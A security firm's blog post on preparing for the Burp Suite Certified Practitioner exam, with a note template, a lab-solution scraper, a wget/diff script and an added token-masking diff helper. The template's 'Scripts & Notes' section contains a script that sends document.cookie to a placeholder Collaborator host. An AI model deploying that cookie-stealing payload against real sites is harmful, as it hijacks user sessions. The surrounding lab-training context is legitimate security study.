Y-Security recently took the challenge of mastering the Burp Suite Certification offered by the creators of the No. 1 Web Application Pentesting Tool Burp Suite, PortSwigger.
Sven Schlüter
sven@y-security.de
Y-Security GmbH
11. January 2022
By becoming a Burp Suite Certified Practitioner, you will be able to demonstrate your web security testing knowledge and Burp Suite skills to the world. This certification will prove to peers, colleagues, and employers, that you have the ability to: Detect and prove the full business impact of a wide range of common web vulnerabilities – such as XSS, SQLi, OWASP Top 10 and HTTP Request Smuggling. Adapt your attack methods to bypass broken defenses, using your knowledge of fundamental web technologies like HTTP, HTML, and encodings. Quickly identify weak points within an attack surface, and perform out-of-band attacks to attack them, using manual tools to aid exploitation.
Portswigger
Preparation
PortSwigger offers Lab Access (for free) to 211 challenges at the time of writing this post. Those challenges are divided into Apprentice, Practitioner and Expert – showing the difficulty level of each challenge.
Extensive learning material is provided (again, for free) to support solving those challenges. The material comes from the creators of the decade-old de facto standard web application testing handbook, which already indicates a high quality level. Furthermore, it provides some very specific details that every upcoming web security expert should know.
The Labs
The labs all have the same setup: categorised vulnerabilities with rising difficulty levels to solve. It looks like this:
Upon choosing a lab exercise you are shown a description of the lab, the PortSwigger solution and, if available, a community solution. When accessing the exercise, it might offer an “Exploit Server” which provides you with functionality to exploit some of the vulnerabilities. For example, you might need to “deliver an exploit” to another user of the application, review requests made to your attacker server or receive emails.
The Exam
Before taking the exam … have you taken the practice exam? The exam will be similar to that, just with two applications instead of one.
I would recommend that anyone taking the exam has most of the Apprentice and Practitioner labs finished. The Expert level labs are good to know, but I didn’t need that knowledge in the exam.
Make sure to familiarise yourself with the exam’s getting-started information. Essentials are the username list, the password list and the Cross-Site Scripting Cheat Sheet.
PortSwigger states that you will need a Burp Suite Professional subscription to take the exam. In our experience, that isn’t true (see the update at the end of this post), but then again, there isn’t anyone doing serious application testing without a working Burp licence, right? Right? … Right!
The proctoring happens after you’ve purchased the exam via the PortSwigger my-account page. As far as I can tell, the proctoring service only binds your user account to a verified ID, so your testing itself won’t be proctored (see my reservation on that in the conclusion). Note that the proctoring service only works with Google Chrome on Windows and requires you to install a Chrome plugin. The exam itself can be taken from another system.
Tips & Hints
At Y-Security we have all passed the PortSwigger exam already, and there are a few things we would like to point out that might help when taking the exam for the first time.
Note Templating
You will receive two applications to test in the exam. The applications might look almost identical and the URLs aren’t memorable either, so it quickly becomes confusing when you’re testing both applications at the same time.
I’ve used the following Markdown template for my note taking to not get the two applications confused:
````markdown
# App 1
## Credentials & Data
### URL
App: https://<<INSERTTOKEN>>.web-security-academy.net/
Exploit-Server: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/
E-Mail: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/email
Access_log: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/log
### Credentials & Sessiontokens
carlos:<<insertpassword>>
<<insertuser>>:<<insertpassword>>
administrator:<<insertpassword>>
### Diffs found
* A
* B
## Attack Paths
### Attack guest to user
* A
* B
```JavaScript
Exploitdetails
```
### Attack user to admin
* A
* B
```JavaScript
Exploitdetails
```
### Attack admin to local file access
* A
* B
```JavaScript
Exploitdetails
```
## Unsuccessful attacks
* A
* B
* C
# App 2
## Credentials & Data
### URL
App: https://<<INSERTTOKEN>>.web-security-academy.net/
Exploit-Server: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/
E-Mail: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/email
Access_log: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/log
### Credentials & Sessiontokens
carlos:<<insertpassword>>
<<insertuser>>:<<insertpassword>>
administrator:<<insertpassword>>
### Diffs found
* A
* B
## Attack Paths
### Attack guest to user
* A
* B
```JavaScript
Exploitdetails
```
### Attack user to admin
* A
* B
```JavaScript
Exploitdetails
```
### Attack admin to local file access
* A
* B
```JavaScript
Exploitdetails
```
## Unsuccessful attacks
* A
* B
* C
# Scripts & Notes
## CSRF
```HTML
<script>
fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
```
## ..
````
It helped me a lot to write down which tests I had already done on which application and which issues I had already discovered (and of course also the issues that were tested but not found to be present).
Have the LAB ready
Often you will recognise a potential attack pattern, so you want to check your notes; or you know the attack but are missing the particular script. Time is key, which is why I dumped the solutions of all labs to my beloved Markdown before I took the exam, using the following quick and dirty script:
```python
#!/usr/bin/env python3
import sys
import requests
import bs4
import html2text
from urllib.parse import urlparse


def writemd(url):
    """Fetch one lab page and save its expanded solution block as Markdown."""
    parts = urlparse(url)
    directories = parts.path.strip('/').split('/')
    filename = directories[-1]  # last path segment becomes the file name
    response = requests.get(url).content
    soup = bs4.BeautifulSoup(response, "lxml")
    div = soup.find("div", {"class": "component-solution is-expandable"})
    if div is None:
        print("no solution block found for " + url, file=sys.stderr)
        return
    h = html2text.HTML2Text()
    md = h.handle(str(div))
    with open(filename + ".md", "w") as f:
        f.write(md)


# Collect every lab link from the overview page and dump its solution.
response = requests.get("https://portswigger.net/web-security/all-labs").content
soup = bs4.BeautifulSoup(response, "lxml")
divs = soup.find_all("div", {"class": "widgetcontainer-lab-link"})
for div in divs:
    linker = div.find("a", href=True)
    link = linker['href']
    print(link)
    writemd("https://portswigger.net" + link)
```
At the very least, have the LAB URL https://portswigger.net/web-security/all-labs available.
Find the difference
As explained above, the applications we have encountered (in the labs and in the exam) are almost identical nearly all the time. Often you can guess in which part a vulnerability lies by diffing the applications against each other. A quick’n’dirty hack to compare two apps is the script below:
```bash
#!/bin/bash
# Instance tokens of the two applications and the session cookie to crawl with
domainONE="ABC.web-security-academy.net"
sessONE="ABC"
domainTWO="ABC.web-security-academy.net"
sessTWO="ABC"
# Mirror each application into a directory named after its hostname
wget --no-cookies --header "Cookie: session=$sessONE" --recursive --page-requisites --adjust-extension --span-hosts --convert-links --restrict-file-names=windows --no-parent --no-check-certificate --domains "$domainONE" "https://$domainONE"
wget --no-cookies --header "Cookie: session=$sessTWO" --recursive --page-requisites --adjust-extension --span-hosts --convert-links --restrict-file-names=windows --no-parent --no-check-certificate --domains "$domainTWO" "https://$domainTWO"
# List files that differ between the two mirrors or exist in only one of them
diff -qr "$domainONE" "$domainTWO" | sort
```
Obviously, you need to replace the two domain tokens and the session. I found this method mildly useful, but maybe it does help others.
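One reason a raw diff of two mirrors is noisy is that the lab token in every hostname, the per-form CSRF token and the session cookie differ between any two instances anyway. The following Python script is an added example (not from the original post) that masks those values before diffing, so the remaining lines point at structural differences such as an endpoint one app exposes and the other does not; the regexes, the `LABTOKEN`/`CSRF`/`SESSION` placeholders and the assumption of one wget mirror directory per hostname are mine.

```python
"""Diff two mirrored exam apps after masking per-instance noise (added example)."""
import difflib
import re
from pathlib import Path

# Values that differ between any two lab instances but carry no signal: the 32-hex
# lab token in hostnames, per-form CSRF tokens, session cookies. Patterns assumed.
NOISE = [
    (re.compile(r"\b[0-9a-f]{32}(?=\.web-security-academy\.net)"), "LABTOKEN"),
    (re.compile(r'(name="csrf"\s+value=")[^"]*"'), r'\1CSRF"'),
    (re.compile(r"session=[A-Za-z0-9%]+"), "session=SESSION"),
]

def normalise(text: str) -> str:
    """Mask instance-specific tokens so only structural differences remain."""
    for pattern, repl in NOISE:
        text = pattern.sub(repl, text)
    return text

def diff_pages(page_a: str, page_b: str) -> list[str]:
    """Return only the added (+) and removed (-) lines between two pages."""
    delta = list(difflib.unified_diff(normalise(page_a).splitlines(),
                                      normalise(page_b).splitlines(),
                                      "app1", "app2", lineterm="", n=0))
    # Drop the two file headers and the @@ hunk markers, keep content lines.
    return [line for line in delta[2:] if not line.startswith("@@")]

def diff_mirrors(dir_a: Path, dir_b: Path) -> dict[str, list[str]]:
    """Diff every HTML file of two wget mirrors, keyed by path inside the mirror."""
    report = {}
    for path_a in dir_a.rglob("*.html"):
        rel = str(path_a.relative_to(dir_a))
        path_b = dir_b / rel
        if not path_b.is_file():
            report[rel] = ["only in app1"]  # endpoint the other app does not expose
            continue
        delta = diff_pages(path_a.read_text(errors="replace"), path_b.read_text(errors="replace"))
        if delta:
            report[rel] = delta
    return report

# Constructed sample pages: same template, different tokens, app2 exposes an extra link.
PAGE_APP1 = """<a href="https://0123456789abcdef0123456789abcdef.web-security-academy.net/">Home</a>
<input type="hidden" name="csrf" value="aaaa1111">
<a href="/my-account">My account</a>"""
PAGE_APP2 = """<a href="https://fedcba9876543210fedcba9876543210.web-security-academy.net/">Home</a>
<input type="hidden" name="csrf" value="bbbb2222">
<a href="/my-account">My account</a>
<a href="/admin-panel">Admin</a>"""
```

Run `diff_mirrors(Path("ABC.web-security-academy.net"), Path("DEF.web-security-academy.net"))` on the two wget directories from the script above; `diff_pages(PAGE_APP1, PAGE_APP2)` on the constructed sample reports only the extra `/admin-panel` link.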
Stay calm
Stay calm, hack and RTFM – you’ve got 4 hours and it might be that you’re spending 3 hours on just 20% of the issues.
When thinking about a potential attack path, remember that there will never be a path directly from “guest” to “admin file-read”, because the exam requires you to follow the exploitation order from guest to user, to admin, to local-file read. An experienced penetration tester might watch out for “all” issues, but depending on where you are in that progression it pays to focus only on the specific vulnerabilities relevant to the current step.
If you have followed the advice to run through the lab exercises beforehand and familiarize yourself with the exam content, it is very likely that you will pass – and if not? Repeat 🙂
Conclusion
PortSwigger created a fantastic exam with some incredibly detailed and useful learning material. Overall, a good certificate to have on your list. We will incorporate parts of the labs in our necessary internal training and our general methodology for web application testing.
The only downside might be that the exam isn’t fully proctored and, with that, the trust in the certificate might become weaker over time.
Sven Schlüter – Y-Security GmbH
The PortSwigger team provides valuable knowledge with their research, tools and Labs and it is great to see that it is shared with the public.
Taking the exam has been fun, as the challenges themselves were absolutely fair and no guessing was needed. The only downside I expected during the exam was that the servers couldn’t be restarted. Hosting a file at “/” on your exploit server might break the whole exam :).
Christian Becker – Y-Security GmbH
Update 14. January 2022
We have received feedback on our PortSwigger Burp Suite Certification post. In particular, we have received feedback about our statement that Burp Suite Professional isn’t required for the exam. We’ve been made aware that external communication is prohibited and only PortSwigger-owned networks and systems are trusted.